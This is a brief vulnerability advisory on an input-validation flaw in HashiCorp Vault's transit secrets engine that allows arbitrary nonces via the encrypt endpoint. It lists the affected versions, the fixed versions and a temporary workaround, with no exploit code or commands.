Sze Chuen Tan

**Name of the Vulnerable Software and Affected Versions** HashiCorp Vault and Vault Enterprise versions 1.6.0 through 1.12.10 HashiCorp Vault and Vault Enterprise versions 1.13.0 through 1.13.6 HashiCorp Vault and Vault Enterprise versions 1.14.0 through 1.14.2 **Description** The issue is related to improper input validation in the transit secrets engine of HashiCorp Vault and Vault Enterprise. This allows authorized users to specify arbitrary nonces, even when convergent encryption is disabled. The `encrypt` endpoint can be used in combination with an offline attack to decrypt arbitrary ciphertext and potentially derive the authentication subkey. **Recommendations** For HashiCorp Vault and Vault Enterprise versions 1.6.0 through 1.12.10, update to version 1.12.11. For HashiCorp Vault and Vault Enterprise versions 1.13.0 through 1.13.6, update to version 1.13.7. For HashiCorp Vault and Vault Enterprise versions 1.14.0 through 1.14.2, update to version 1.14.3. As a temporary workaround, consider restricting access to the `encrypt` endpoint until a patch is available.